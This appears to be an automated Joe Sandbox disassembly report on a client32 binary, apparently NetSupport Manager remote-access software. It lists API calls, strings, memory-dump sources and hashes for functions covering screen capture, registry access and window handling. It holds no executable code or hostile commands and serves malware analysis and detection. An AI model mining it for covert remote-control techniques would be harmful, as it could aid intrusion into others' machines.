                                                                                  • API String ID: 348974188-2591373181
                                                                                  • Opcode ID: 044dce669899cd37b7012f5320303afde3b4de6bbd5268eb7c3f06993fea3566
                                                                                  • Instruction ID: c6fb8941b728de1d874c8cf5bae9c94d2d097e9c1a5b8d4b24900e8511d45065
                                                                                  • Opcode Fuzzy Hash: 044dce669899cd37b7012f5320303afde3b4de6bbd5268eb7c3f06993fea3566
                                                                                  • Instruction Fuzzy Hash: A2C17DB1D0066A9FDB22DF658D846ADFAB8BB09314F4141FAE65CE7280D7309B84CF51
                                                                                  Function 1105D240 Relevance: 36.9, APIs: 17, Strings: 4, Instructions: 124filewindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenFileMappingA.KERNEL32(000F001F,00000000,-00000007), ref: 1105D277
                                                                                  • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 1105D294
                                                                                  • GetDC.USER32(00000000), ref: 1105D2BB
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 1105D2CF
                                                                                  • CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 1105D2F2
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 1105D300
                                                                                  • GetTickCount.KERNEL32 ref: 1105D30F
                                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1105D333
                                                                                  • GetTickCount.KERNEL32 ref: 1105D33C
                                                                                  • GetLastError.KERNEL32(?), ref: 1105D348
                                                                                  • GdiFlush.GDI32 ref: 1105D35C
                                                                                  • SelectObject.GDI32(00000000,?), ref: 1105D367
                                                                                  • DeleteObject.GDI32(00000000), ref: 1105D36E
                                                                                  • DeleteDC.GDI32(00000000), ref: 1105D378
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 1105D384
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 1105D38E
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 1105D396
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileObject$CountCreateDeleteSelectTickView$CloseCompatibleErrorFlushHandleLastMappingOpenReleaseSectionUnmap
                                                                                  • String ID: /thumb:$@Ls$Error %d blitting from winlogon, took %d ms$ThumbWL
                                                                                  • API String ID: 652520247-902970609
                                                                                  • Opcode ID: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
                                                                                  • Instruction ID: 78b6d8997dae8530c3cf648a665dcf4201cc58d59c57f0d4bee68b800920de56
                                                                                  • Opcode Fuzzy Hash: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
                                                                                  • Instruction Fuzzy Hash: 924190B9E41229AFD704CFA4DD89FAEBBB8FB48704F104165F920A7644D730A901CBA1
                                                                                  Function 1102B4C0 Relevance: 33.5, APIs: 4, Strings: 15, Instructions: 291timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                                    • Part of subcall function 110CFE80: _malloc.LIBCMT ref: 110CFE9A
                                                                                    • Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 110ED1CB
                                                                                  • wsprintfA.USER32 ref: 1102B84D
                                                                                    • Part of subcall function 110ED8F0: RegQueryInfoKeyA.ADVAPI32(0002001F,?,?,0002001F,?,?,0002001F,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,1102B625), ref: 110ED926
                                                                                  • FileTimeToSystemTime.KERNEL32(0002001F,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 1102B65A
                                                                                  • wsprintfA.USER32 ref: 1102B69E
                                                                                  • wsprintfA.USER32 ref: 1102B705
                                                                                    • Part of subcall function 110EDF70: wsprintfA.USER32 ref: 110EDFD4
                                                                                    • Part of subcall function 110EDF70: _malloc.LIBCMT ref: 110EE053
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: wsprintf$Time_malloc$EnumFileInfoOpenQuerySystem
                                                                                  • String ID: %02d/%02d/%02d %02d:%02d:%02d.%03d$%s\%s$Accel=restored$Acceleration$DirectSound$DirectSound\Device Presence$DirectSound\Mixer Defaults$Error. Can't open %s$IsA()$Software\NSL\Saved\DS$WDM$Warning. DSReg e=%d, e2=%d$accel=%d, wdm=%d, key=%s, mix=%s, dev=%s$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$set %s=15, e=%d
                                                                                  • API String ID: 2153351953-120756110
                                                                                  • Opcode ID: 55af8f51facff4bcc049042925dfacc4f9a74063fc1775215d98820dbec6b2aa
                                                                                  • Instruction ID: 3d8c04e41a601bc5ed25e478ecb801087f545ab88011abf8f54d42b1378c6c4c
                                                                                  • Opcode Fuzzy Hash: 55af8f51facff4bcc049042925dfacc4f9a74063fc1775215d98820dbec6b2aa
                                                                                  • Instruction Fuzzy Hash: CEB17075D0122AAFDB24DB55CD98FEDB7B8EF05308F4041D9E91962280EB346E88CF61
                                                                                  Function 1113B660 Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 308COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SystemParametersInfoA.USER32(00000010,00000000,111F1A18,00000000), ref: 1113B6F2
                                                                                  • SystemParametersInfoA.USER32(00000011,00000000,00000000,00000000), ref: 1113B705
                                                                                  • SHGetFolderPathA.SHFOLDER(00000000,00000010,00000000,00000000,00000000), ref: 1113B89D
                                                                                  • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 1113B8B3
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 1113B8FB
                                                                                    • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                  • SystemParametersInfoA.USER32(00000011,00000001,00000000,00000000), ref: 1113BA43
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InfoParametersSystem$CloseDirectoryFolderHandlePathWindows__wcstoi64
                                                                                  • String ID: Client$PrefixName$RecordAudio$ReplayFiles$ReplayPath$Show$ShowRecord$ShowToWindow$UI: End Show$UI: Start Show$\Desktop
                                                                                  • API String ID: 3054845645-718119679
                                                                                  • Opcode ID: 00ec13e67940f28baf0848d28a2c1b2f51011c725dd50b87b3bc4ac92110142a
                                                                                  • Instruction ID: 97c658d0ff47ffb6e0b086364488060456d2f78afd94873c83fd0d8ea8d00dc5
                                                                                  • Opcode Fuzzy Hash: 00ec13e67940f28baf0848d28a2c1b2f51011c725dd50b87b3bc4ac92110142a
                                                                                  • Instruction Fuzzy Hash: 9DB15A74B41625AFE316DBA0CD91FE9FB61FB84B19F004129FA15AB2C8E770B840C795
                                                                                  Function 110EB540 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 141windowtimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                  • wsprintfA.USER32 ref: 110EB5D8
                                                                                  • GetTickCount.KERNEL32 ref: 110EB632
                                                                                  • SendMessageA.USER32(?,0000004A,?,?), ref: 110EB646
                                                                                  • GetTickCount.KERNEL32 ref: 110EB64E
                                                                                  • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB696
                                                                                  • OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000000), ref: 110EB6C8
                                                                                  • SetEvent.KERNEL32(00000000,?,00000000), ref: 110EB6D5
                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000), ref: 110EB6DC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
                                                                                  • String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
                                                                                  • API String ID: 3451743168-2289091950
                                                                                  • Opcode ID: ead4b02f65febedee58ec954df4c387db7c39c25c30fbfeabe7c28379be18f45
                                                                                  • Instruction ID: 06eeb675c9fb82aaee3c5e1b90d71b9ae50c85907530b7dc4e87486fa2a47647
                                                                                  • Opcode Fuzzy Hash: ead4b02f65febedee58ec954df4c387db7c39c25c30fbfeabe7c28379be18f45
                                                                                  • Instruction Fuzzy Hash: A141E775A012199FD724CFA5DC84FAEF7B8EF48304F1085AAE91AA7640D631AD40CFB1
                                                                                  Function 11039410 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 126windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                    • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                    • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                    • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                    • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                  • GetDlgItem.USER32(00000000,00000001), ref: 1103944A
                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 1103944F
                                                                                  • _calloc.LIBCMT ref: 1103945C
                                                                                  • GetSystemMenu.USER32(?,00000000), ref: 11039490
                                                                                  • EnableMenuItem.USER32(00000000,0000F060,00000002), ref: 1103949E
                                                                                  • GetDlgItem.USER32(00000000,0000044E), ref: 110394BC
                                                                                  • SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000043), ref: 11039509
                                                                                  • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043), ref: 11039538
                                                                                  • UpdateWindow.USER32(00000000), ref: 11039567
                                                                                  • BringWindowToTop.USER32(?), ref: 1103956E
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                    • Part of subcall function 1115FFC0: SetForegroundWindow.USER32(?), ref: 1115FFEE
                                                                                  • MessageBeep.USER32(000000FF), ref: 1103957F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$Item$EnableMenuMessage$BeepBringErrorExitForegroundLastObjectProcessRectShowSystemTextUpdate_callocwsprintf
                                                                                  • String ID: CLTCONN.CPP$e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$m_nc
                                                                                  • API String ID: 4191401721-1182766118
                                                                                  • Opcode ID: 51b6937d982a358fdf259d5baecad387e1d1d56d4f23d55ad49fb18189202900
                                                                                  • Instruction ID: fea8d420f6ab3010a63bc2930e21c2de0d8b75aa48f279369a9769ea0f724755
                                                                                  • Opcode Fuzzy Hash: 51b6937d982a358fdf259d5baecad387e1d1d56d4f23d55ad49fb18189202900
                                                                                  • Instruction Fuzzy Hash: 0C411AB9B803157BE7209761DC87F9AF398AB84B1CF104434F3267B6C0EAB5B4408759
                                                                                  Function 110CB450 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 117registryclipboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(111F3420,?,00000000,00000000,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB45E
                                                                                  • RegisterClipboardFormatA.USER32(WM_ATLGETHOST), ref: 110CB46F
                                                                                  • RegisterClipboardFormatA.USER32(WM_ATLGETCONTROL), ref: 110CB47B
                                                                                  • GetClassInfoExA.USER32(11000000,AtlAxWin100,?), ref: 110CB4A0
                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 110CB4D1
                                                                                  • RegisterClassExA.USER32(?), ref: 110CB4F2
                                                                                  • _memset.LIBCMT ref: 110CB51B
                                                                                  • GetClassInfoExA.USER32(11000000,AtlAxWinLic100,?), ref: 110CB536
                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 110CB56B
                                                                                  • RegisterClassExA.USER32(?), ref: 110CB58C
                                                                                  • LeaveCriticalSection.KERNEL32(111F3420,0000000E), ref: 110CB5B5
                                                                                  • LeaveCriticalSection.KERNEL32(111F3420,?,?,?,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB5CB
                                                                                    • Part of subcall function 110C2C00: __recalloc.LIBCMT ref: 110C2C48
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ClassRegister$CriticalSection$ClipboardCursorFormatInfoLeaveLoad$Enter__recalloc_memset
                                                                                  • String ID: AtlAxWin100$AtlAxWinLic100$WM_ATLGETCONTROL$WM_ATLGETHOST
                                                                                  • API String ID: 2220097787-1587594278
                                                                                  • Opcode ID: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
                                                                                  • Instruction ID: 380367346e18165f725bae6bc82d4f79de56b371e9301c8febdab5dbf058e0d0
                                                                                  • Opcode Fuzzy Hash: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
                                                                                  • Instruction Fuzzy Hash: 854179B5D02229ABCB01DFD9E984AEEFFB9FB48714F50406AE415B3200DB351A44CFA4
                                                                                  Function 11003650 Relevance: 27.2, APIs: 18, Instructions: 171COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSysColor.USER32(00000004), ref: 11003691
                                                                                    • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 111430F4
                                                                                    • Part of subcall function 111430E0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11143109
                                                                                    • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 11143111
                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 110036A5
                                                                                  • GetStockObject.GDI32(00000007), ref: 110036B0
                                                                                  • SelectObject.GDI32(?,00000000), ref: 110036BB
                                                                                  • SelectObject.GDI32(?,?), ref: 110036CC
                                                                                  • GetSysColor.USER32(00000010), ref: 110036DC
                                                                                  • GetSysColor.USER32(00000010), ref: 110036F3
                                                                                  • GetSysColor.USER32(00000014), ref: 1100370A
                                                                                  • GetSysColor.USER32(00000014), ref: 11003721
                                                                                  • GetSysColor.USER32(00000014), ref: 1100373E
                                                                                  • GetSysColor.USER32(00000014), ref: 11003755
                                                                                  • GetSysColor.USER32(00000010), ref: 1100376C
                                                                                  • GetSysColor.USER32(00000010), ref: 11003783
                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 110037A0
                                                                                  • Rectangle.GDI32(?,?,00000001,?,?), ref: 110037BA
                                                                                  • SelectObject.GDI32(?,?), ref: 110037CE
                                                                                  • SelectObject.GDI32(?,?), ref: 110037D8
                                                                                  • DeleteObject.GDI32(?), ref: 110037DE
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Color$Object$Select$BrushCreateDeleteInflateRectRectangleSolidStockText
                                                                                  • String ID:
                                                                                  • API String ID: 3698065672-0
                                                                                  • Opcode ID: b833179956e3f332fb7c6e9edd2a8bf0286dfddfec6fc6f9ae6a9a20b302d007
                                                                                  • Instruction ID: a23acd2a2556d2351ec77cf4709ac6c6322e0be3c302c098e9beaf4924cedc1a
                                                                                  • Opcode Fuzzy Hash: b833179956e3f332fb7c6e9edd2a8bf0286dfddfec6fc6f9ae6a9a20b302d007
                                                                                  • Instruction Fuzzy Hash: 78515EB5900309AFE714DFA5CC85EBBF3BDEF98704F104A18E611A7691D670B944CBA1
                                                                                  Function 1104B7F0 Relevance: 26.5, APIs: 3, Strings: 12, Instructions: 229timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLocalTime.KERNEL32(?,FailedAttacks,00000001,FailedAttacks,00000000,80000002,Software\Productive Computer Insight\Client32,0002001F,00000000,00000000,?,?,?,50D94AA1,?,?), ref: 1104B8F6
                                                                                  • _sprintf.LIBCMT ref: 1104B923
                                                                                    • Part of subcall function 110ED9F0: RegSetValueExA.ADVAPI32(00000002,?,00000000,?,00000001,00000003,?,?,?,?,11112835,authcode,?,00000001,authcode,000F003F), ref: 110EDA19
                                                                                  • _strncpy.LIBCMT ref: 1104BACE
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
